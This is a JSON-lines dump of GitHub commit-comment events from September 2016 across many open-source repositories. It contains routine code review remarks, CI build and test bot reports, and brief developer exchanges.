{"id":"4611624015","type":"CommitCommentEvent","actor":{"login":"dsoldera"},"repo":{"name":"rodrigosclosa/dojo-ionic"},"payload":{"comment":{"id":19155110,"position":null,"line":null,"path":null,"commit_id":"4013a369cfe78e164d8a698f356178c78b4cfec5","created_at":"2016-09-24T00:40:20Z","updated_at":"2016-09-24T00:40:20Z","body":"Douglas @dssiqueira poderia verificar e fechar esse bug?\r\n\r\nGracias!!"}},"created_at":"2016-09-24T00:40:20Z"}
{"id":"4611625432","type":"CommitCommentEvent","actor":{"login":"spershin"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19155116,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-24T00:41:07Z","updated_at":"2016-09-24T00:41:07Z","body":"Yeah, was added back ~ 2 days ago.\r\nThat's about time I've been dancing around with folly, wangle and thrift, trying to compile them.\r\nHaven't cloned folly for probably longer than that.\r\nI would assume it will build now.\r\n"}},"created_at":"2016-09-24T00:41:07Z"}
{"id":"4611626118","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19155119,"position":null,"line":null,"path":null,"commit_id":"502e3ec2451cccb7a71b157098e9abff78778481","created_at":"2016-09-24T00:41:32Z","updated_at":"2016-09-24T00:41:32Z","body":"I reread your email and realized you wanted these in the codebase.\r\nSo I just committed this to the codebase."}},"created_at":"2016-09-24T00:41:32Z"}
{"id":"4611626495","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19155122,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:41:45Z","updated_at":"2016-09-24T00:41:45Z","body":"I reread your email and realized you wanted these in the codebase.\r\nSo I just committed this to the codebase."}},"created_at":"2016-09-24T00:41:45Z"}
{"id":"4611626717","type":"CommitCommentEvent","actor":{"login":"leaf4806"},"repo":{"name":"leaf4806/html"},"payload":{"comment":{"id":19155123,"position":null,"line":null,"path":null,"commit_id":"27585eed98cef013115341fdabeae3baa5599a36","created_at":"2016-09-24T00:41:53Z","updated_at":"2016-09-24T00:41:53Z","body":"+# html\r\n+html5"}},"created_at":"2016-09-24T00:41:53Z"}
{"id":"4611627469","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19155129,"position":null,"line":null,"path":null,"commit_id":"0cc3b6108ef7be42175c9c2544629fc928b3bdac","created_at":"2016-09-24T00:42:16Z","updated_at":"2016-09-24T00:42:16Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2321 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.99%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T00:42:16Z"}
{"id":"4611627910","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19155131,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:42:29Z","updated_at":"2016-09-24T00:42:29Z","body":"Can do the above fixes in another commit. If possible, will be better to start working from the official development master branch."}},"created_at":"2016-09-24T00:42:29Z"}
{"id":"4611633563","type":"CommitCommentEvent","actor":{"login":"painhardcore"},"repo":{"name":"tomkwok/journey"},"payload":{"comment":{"id":19155158,"position":null,"line":null,"path":null,"commit_id":"6c02d9445a1f5c8f365fa409c2de59b8d104a12e","created_at":"2016-09-24T00:45:33Z","updated_at":"2016-09-24T00:45:33Z","body":"@twinj  what right replacement for uuid.Clean ? uuid.FormatHex or uuid.FormatCanonical?\r\nI'am confused because FormatCanonical  is replacement for CleanHyphen."}},"created_at":"2016-09-24T00:45:33Z"}
{"id":"4611633863","type":"CommitCommentEvent","actor":{"login":"bosilca"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":19155160,"position":null,"line":null,"path":null,"commit_id":"45dcf1f5d79a1872c7eec5e4456e58524003a2e6","created_at":"2016-09-24T00:45:42Z","updated_at":"2016-09-24T00:45:42Z","body":"Depends on the timer. Mine was, but I noticed that I might have screwed up the RDTSC. I'll push a fix soon."}},"created_at":"2016-09-24T00:45:42Z"}
{"id":"4611634231","type":"CommitCommentEvent","actor":{"login":"srajama1"},"repo":{"name":"ambrad/Trilinos"},"payload":{"comment":{"id":19155162,"position":null,"line":null,"path":null,"commit_id":"bb2bf9c234664dbb05635f9c0f3b6a9c04a2d569","created_at":"2016-09-24T00:45:54Z","updated_at":"2016-09-24T00:45:54Z","body":"Line 679 is to satisfy some compiler warning ?"}},"created_at":"2016-09-24T00:45:54Z"}
{"id":"4611638347","type":"CommitCommentEvent","actor":{"login":"gottesmm"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19155172,"position":5,"line":1203,"path":"cmake/modules/AddSwift.cmake","commit_id":"fde50dcc814d24478d798f2a55bf72ba355a8e1c","created_at":"2016-09-24T00:48:00Z","updated_at":"2016-09-24T00:48:00Z","body":"I see why you are doing this. I just hate how this code in general is organized. It is not centralized = /.\r\n\r\nWhat should really happen here is that this code should be moved into the section below where we already do code specific to target libraries. At some point, I think we will refactor that huge block into target/non-target code."}},"created_at":"2016-09-24T00:48:00Z"}
{"id":"4611638786","type":"CommitCommentEvent","actor":{"login":"gottesmm"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19155174,"position":5,"line":1203,"path":"cmake/modules/AddSwift.cmake","commit_id":"fde50dcc814d24478d798f2a55bf72ba355a8e1c","created_at":"2016-09-24T00:48:12Z","updated_at":"2016-09-24T00:48:12Z","body":"Can you move this code into that block below?"}},"created_at":"2016-09-24T00:48:12Z"}
{"id":"4611641138","type":"CommitCommentEvent","actor":{"login":"cwleonard"},"repo":{"name":"cwleonard/comic"},"payload":{"comment":{"id":19155183,"position":null,"line":null,"path":null,"commit_id":"c235ea5238e76194b39f6ee7e5af92b5562242db","created_at":"2016-09-24T00:49:34Z","updated_at":"2016-09-24T00:49:34Z","body":"resolves issue #13 "}},"created_at":"2016-09-24T00:49:34Z"}
{"id":"4611645196","type":"CommitCommentEvent","actor":{"login":"zhongwulai"},"repo":{"name":"AstraZeneca-NGS/VarDict"},"payload":{"comment":{"id":19155199,"position":null,"line":null,"path":null,"commit_id":"5f883061263a0de2575416a728cb2b3e7fa82b15","created_at":"2016-09-24T00:51:43Z","updated_at":"2016-09-24T00:51:43Z","body":"One more added option I forgot to mention.  There's new \"-J INT\" option for CRISPR sequencing.  The value is the 5' of the predicted cutting site from CRISPR's guide design.  When set, VarDict will call InDels variants due to CRISPR editing that shift as close to the cutting side as possible, instead of always on most 5' position per HGVS's recommendation.  It only matters if there're alternative alignments for the InDels (microhomology).  At the moment, only one CRISPR/position at a time. "}},"created_at":"2016-09-24T00:51:43Z"}
{"id":"4611645447","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155200,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T00:51:52Z","updated_at":"2016-09-24T00:51:52Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.75%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-24T00:51:52Z"}
{"id":"4611645805","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155201,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-24T00:52:06Z","updated_at":"2016-09-24T00:52:06Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2334 of 2344 tests passed, 25 test warnings)\n\n * 35 tests had: AUD diffs.\n * 6 tests had: EIO diffs.\n * 6 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 10 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T00:52:06Z"}
{"id":"4611646992","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155206,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T00:52:45Z","updated_at":"2016-09-24T00:52:45Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T00:52:45Z"}
{"id":"4611650245","type":"CommitCommentEvent","actor":{"login":"rafaelgomes10"},"repo":{"name":"W3CCRONOS/ContSalt"},"payload":{"comment":{"id":19155212,"position":5,"line":37,"path":"ContSaltApp/src/java/classDAO/ClienteDAO.java","commit_id":"01ae656552a028532a92e5c38db515926321dbe9","created_at":"2016-09-24T00:54:38Z","updated_at":"2016-09-24T00:54:38Z","body":"alterção feita pelo almir"}},"created_at":"2016-09-24T00:54:38Z"}
{"id":"4611652106","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"facelessuser/ApplySyntax"},"payload":{"comment":{"id":19155219,"position":3,"line":3,"path":"readme.md","commit_id":"a77e39249a7c044ead2303c45e6df63d0f60d175","created_at":"2016-09-24T00:55:39Z","updated_at":"2016-09-24T00:55:39Z","body":"#2020"}},"created_at":"2016-09-24T00:55:39Z"}
{"id":"4611654394","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19155226,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T00:56:59Z","updated_at":"2016-09-24T00:56:59Z","body":"How did livestreamer do it without installing python at all?"}},"created_at":"2016-09-24T00:56:59Z"}
{"id":"4611654790","type":"CommitCommentEvent","actor":{"login":"keedya"},"repo":{"name":"geoff-reid/docs"},"payload":{"comment":{"id":19155228,"position":null,"line":null,"path":null,"commit_id":"b0f5c1963e9faf210b8e9ca49cec196ccf553e7d","created_at":"2016-09-24T00:57:12Z","updated_at":"2016-09-24T00:57:12Z","body":":+1:"}},"created_at":"2016-09-24T00:57:12Z"}
{"id":"4611655769","type":"CommitCommentEvent","actor":{"login":"gnavaumb"},"repo":{"name":"gnavaumb/swot"},"payload":{"comment":{"id":19155234,"position":1,"line":1,"path":"lib/domains/mx/umbmx","commit_id":"ddc78ff5f4d6b00ae5bc2b7dfe807ec92d8f92fb","created_at":"2016-09-24T00:57:43Z","updated_at":"2016-09-24T00:57:43Z","body":"Universidad Mexiquense del Bicentenario"}},"created_at":"2016-09-24T00:57:43Z"}
{"id":"4611660845","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19155251,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T01:00:35Z","updated_at":"2016-09-24T01:00:35Z","body":"It shipped the full interpreter but used a tool to detect which modules to import, so it could remove a lot of stuff."}},"created_at":"2016-09-24T01:00:35Z"}
{"id":"4611663323","type":"CommitCommentEvent","actor":{"login":"david-why"},"repo":{"name":"ruf/learn_pi"},"payload":{"comment":{"id":19155258,"position":null,"line":null,"path":null,"commit_id":"033d1b755479b16d6f41e3d1d5b313cb2082ae33","created_at":"2016-09-24T01:02:02Z","updated_at":"2016-09-24T01:02:02Z","body":"多谢！"}},"created_at":"2016-09-24T01:02:02Z"}
{"id":"4611663494","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19155259,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T01:02:09Z","updated_at":"2016-09-24T01:02:09Z","body":"Is that possible to implement down the road Sbstp?  When things are more stable "}},"created_at":"2016-09-24T01:02:09Z"}
{"id":"4611666513","type":"CommitCommentEvent","actor":{"login":"vpatryshev"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19155268,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-24T01:03:50Z","updated_at":"2016-09-24T01:03:50Z","body":"See, I consider this pr from Jakub as extremely good. It's unfortunate that\nit's so huge. I have some minor notes regarding some minor things (can add\nthose comments on github); and the only big remark is: where are the tests?\nThere's a lot of new code, but no new tests. That's unfortunate.\n\nAnd of course we had to synchronize somehow. :)\n\nThanks,\n-Vlad\n\nOn Fri, Sep 23, 2016 at 1:45 PM, Michal Malohlava <notifications@github.com>\nwrote:\n\n> We are working in parallel, however, we should synchronized on overlapping\n> pieces.\n> Please comment on the PR or let's do a group call with @jakubhava\n> <https://github.com/jakubhava> to clarify overall intentions.\n> FYI: @jakubhava <https://github.com/jakubhava> will be in the office in\n> 2weeks\n>\n> It was partly reason why I asked the question^^ - since integrating big\n> changes is always pain. Splitting them into smaller PRs can be at the end\n> beneficial for all. Also improve testability.\n>\n> Sorry, for holding the PR.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/h2oai/sparkling-water/commit/cd3673c5b15a9e9f487d56044c30437acb9f5f51#commitcomment-19152689>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOuK-Tfx3rgIICP0pogp2LtDgipDcJWks5qtDpagaJpZM4KE6Wt>\n> .\n>\n"}},"created_at":"2016-09-24T01:03:50Z"}
{"id":"4611666954","type":"CommitCommentEvent","actor":{"login":"BillLori"},"repo":{"name":"BillLori/Poi-anno"},"payload":{"comment":{"id":19155270,"position":null,"line":null,"path":null,"commit_id":"7cab3529c029d0dc0d0edc175fb9cfc049b6537d","created_at":"2016-09-24T01:04:05Z","updated_at":"2016-09-24T01:04:05Z","body":"This is cool "}},"created_at":"2016-09-24T01:04:05Z"}
{"id":"4611668223","type":"CommitCommentEvent","actor":{"login":"amilner42"},"repo":{"name":"van-startup-week-2016/workout-app"},"payload":{"comment":{"id":19155279,"position":null,"line":null,"path":null,"commit_id":"6691d8c78d5460d294d9d3c176c9fb90f9038185","created_at":"2016-09-24T01:04:57Z","updated_at":"2016-09-24T01:04:57Z","body":"Cloned from kickstarter: github.com/amilner42/mea2n-kickstarter"}},"created_at":"2016-09-24T01:04:57Z"}
{"id":"4611668911","type":"CommitCommentEvent","actor":{"login":"sknep"},"repo":{"name":"sivan/gulp-assets-plus"},"payload":{"comment":{"id":19155281,"position":4,"line":33,"path":"README.md","commit_id":"b49aad5402a7db7571feb2c95676d465a61c9e1e","created_at":"2016-09-24T01:05:21Z","updated_at":"2016-09-24T01:05:21Z","body":"Any chance you'd consider fixing the spelling \"hashAseets\" to \"hashAssets\"?"}},"created_at":"2016-09-24T01:05:21Z"}
{"id":"4611674098","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19155296,"position":null,"line":null,"path":null,"commit_id":"dd23352b116f620f5a51561f2f9540abffb6abde","created_at":"2016-09-24T01:08:32Z","updated_at":"2016-09-24T01:08:32Z","body":"Thanks for bringing this up, I'm too used to this to notice the oddness here and there. Created https://github.com/magarena/magarena/issues/893 to address this issue."}},"created_at":"2016-09-24T01:08:32Z"}
{"id":"4611675664","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19155300,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-24T01:09:35Z","updated_at":"2016-09-24T01:09:35Z","body":"Yes, you are reading my mind 👍  Kuba will be here in the October: the plan/vision is to make bigger push on QA. Not only test coverage, but enabling missing test scenarios for Notebooks/Standalone Spark server, more junit tests, more integration tests with H2O. The motivation is to improve overall stability of H2O via Sparkling Water."}},"created_at":"2016-09-24T01:09:35Z"}
{"id":"4611677417","type":"CommitCommentEvent","actor":{"login":"jcrossley3"},"repo":{"name":"projectodd/kubesh"},"payload":{"comment":{"id":19155306,"position":66,"line":75,"path":"kubesh.go","commit_id":"364bbd19ae2c304345c7ad6153eef8db289d34f2","created_at":"2016-09-24T01:10:43Z","updated_at":"2016-09-24T01:10:43Z","body":"Didn't we decide on 'cd'? You're such a rebel, Dottie. :)"}},"created_at":"2016-09-24T01:10:43Z"}
{"id":"4611678545","type":"CommitCommentEvent","actor":{"login":"twinj"},"repo":{"name":"tomkwok/journey"},"payload":{"comment":{"id":19155313,"position":null,"line":null,"path":null,"commit_id":"6c02d9445a1f5c8f365fa409c2de59b8d104a12e","created_at":"2016-09-24T01:11:25Z","updated_at":"2016-09-24T01:11:25Z","body":"As you are aware there was a change, benchmarks showed an improved speed of format by at least 10 times. To achieve this I had to drop an %X in the format patterns. I changed the names to reflect this major change. \r\n\r\nThe default format is FormatCanonical xxxxxxxx-xxxx-xxxx-xxxx-xxxxxx. If this is the one you want you only need to use NewV4().String(). This format is twice as fast as the others at producing the string from the bytes.\r\n\r\nIf you wish to change to another format permanently use:\r\n\r\n`uuid.SwitchFormat(uuid.FormatHex)\r\n`\r\n\r\nAvailable formats; from the code: format.go\r\n\r\n`const (\r\n\tFormatHex        Format = \"%x%x%x%x%x\"\r\n\tFormatHexCurly   Format = \"{%x%x%x%x%x}\"\r\n\tFormatHexBracket Format = \"(%x%x%x%x%x)\"\r\n\r\n\t// This is the canonical format.\r\n\tFormatCanonical Format = \"%x-%x-%x-%x-%x\"\r\n\r\n\tFormatCanonicalCurly   Format = \"{%x-%x-%x-%x-%x}\"\r\n\tFormatCanonicalBracket Format = \"(%x-%x-%x-%x-%x)\"\r\n\tFormatUrn              Format = \"urn:uuid:\" + FormatCanonical\r\n)`\r\n\r\nAnother option is to use only uuid.NewV4() without the call to string as it supports the sql driver.Value and Scan methods."}},"created_at":"2016-09-24T01:11:25Z"}
{"id":"4611679602","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19155321,"position":null,"line":null,"path":null,"commit_id":"a2b3e8653fa20ca2378cf9d3ec022d6b6fa72a65","created_at":"2016-09-24T01:12:06Z","updated_at":"2016-09-24T01:12:06Z","body":"`cryptest.sh` reported:\r\n\r\n```\r\n************************************\r\nTesting: Install (benchmarks)\r\n\r\nCryptoPP::Exception caught: cryptest.exe: '2.4+1e9' is not a value\r\nERROR: failed to execute benchmarks\r\n```\r\n\r\nThe value should have been `2.4`, not `2.4+1e9`. The improved checking from [Issue 299](http://github.com/weidai11/cryptopp/issues/299) caught it."}},"created_at":"2016-09-24T01:12:06Z"}
{"id":"4611683577","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19155325,"position":20,"line":174,"path":"src/bql.py","commit_id":"2bab92bc76d04161c3cf9cbf3f794f6796071556","created_at":"2016-09-24T01:14:22Z","updated_at":"2016-09-24T01:14:22Z","body":"Why `-1`? Should use i.e. a sentinel object -- negative numbers are reserved for latent variables in BayesBD, so `-1` will cause issues."}},"created_at":"2016-09-24T01:14:22Z"}
{"id":"4611684226","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19155327,"position":6,"line":148,"path":"src/bql.py","commit_id":"2bab92bc76d04161c3cf9cbf3f794f6796071556","created_at":"2016-09-24T01:14:49Z","updated_at":"2016-09-24T01:14:49Z","body":"1 extra indent after the `if` to separate it from the body of the branch."}},"created_at":"2016-09-24T01:14:49Z"}
{"id":"4611685415","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19155331,"position":16,"line":170,"path":"src/bql.py","commit_id":"2bab92bc76d04161c3cf9cbf3f794f6796071556","created_at":"2016-09-24T01:15:31Z","updated_at":"2016-09-24T01:15:31Z","body":"Prefer to store `['rowid', '_rowid_', 'oid']` as some module level variable, like `ROWID`."}},"created_at":"2016-09-24T01:15:31Z"}
{"id":"4611686249","type":"CommitCommentEvent","actor":{"login":"tomsnode"},"repo":{"name":"tomsnode/Silica"},"payload":{"comment":{"id":19155332,"position":1,"line":1,"path":"Silica.py","commit_id":"cfa09734f8bbba5113e9f3cb66c5baccf611c41b","created_at":"2016-09-24T01:16:00Z","updated_at":"2016-09-24T01:16:00Z","body":"From silica\r\n\r\n"}},"created_at":"2016-09-24T01:16:00Z"}
{"id":"4611689252","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155344,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:17:54Z","updated_at":"2016-09-24T01:17:54Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:17:54Z"}
{"id":"4611689304","type":"CommitCommentEvent","actor":{"login":"zuo"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19155345,"position":15,"line":346,"path":"NEWS.md","commit_id":"fc3cbc9e15c73c937afbee35e08b8809ef282f58","created_at":"2016-09-24T01:17:56Z","updated_at":"2016-09-24T01:17:56Z","body":"@JeffBezanson: shouldn't it be corrected in the latest + 0.5.1 versions of `NEWS.md`?"}},"created_at":"2016-09-24T01:17:56Z"}
{"id":"4611689470","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155347,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:03Z","updated_at":"2016-09-24T01:18:03Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:03Z"}
{"id":"4611689507","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155348,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:05Z","updated_at":"2016-09-24T01:18:05Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:05Z"}
{"id":"4611689537","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155349,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:06Z","updated_at":"2016-09-24T01:18:06Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:06Z"}
{"id":"4611689544","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155350,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:06Z","updated_at":"2016-09-24T01:18:06Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:06Z"}
{"id":"4611690352","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155354,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:33Z","updated_at":"2016-09-24T01:18:33Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:33Z"}
{"id":"4611690380","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155355,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:34Z","updated_at":"2016-09-24T01:18:34Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:34Z"}
{"id":"4611690396","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155356,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:35Z","updated_at":"2016-09-24T01:18:35Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:35Z"}
{"id":"4611690454","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155357,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:37Z","updated_at":"2016-09-24T01:18:37Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:37Z"}
{"id":"4611690505","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155358,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:38Z","updated_at":"2016-09-24T01:18:38Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:38Z"}
{"id":"4611690520","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155359,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:39Z","updated_at":"2016-09-24T01:18:39Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:39Z"}
{"id":"4611690564","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155360,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:41Z","updated_at":"2016-09-24T01:18:41Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:41Z"}
{"id":"4611690599","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155361,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:42Z","updated_at":"2016-09-24T01:18:42Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:42Z"}
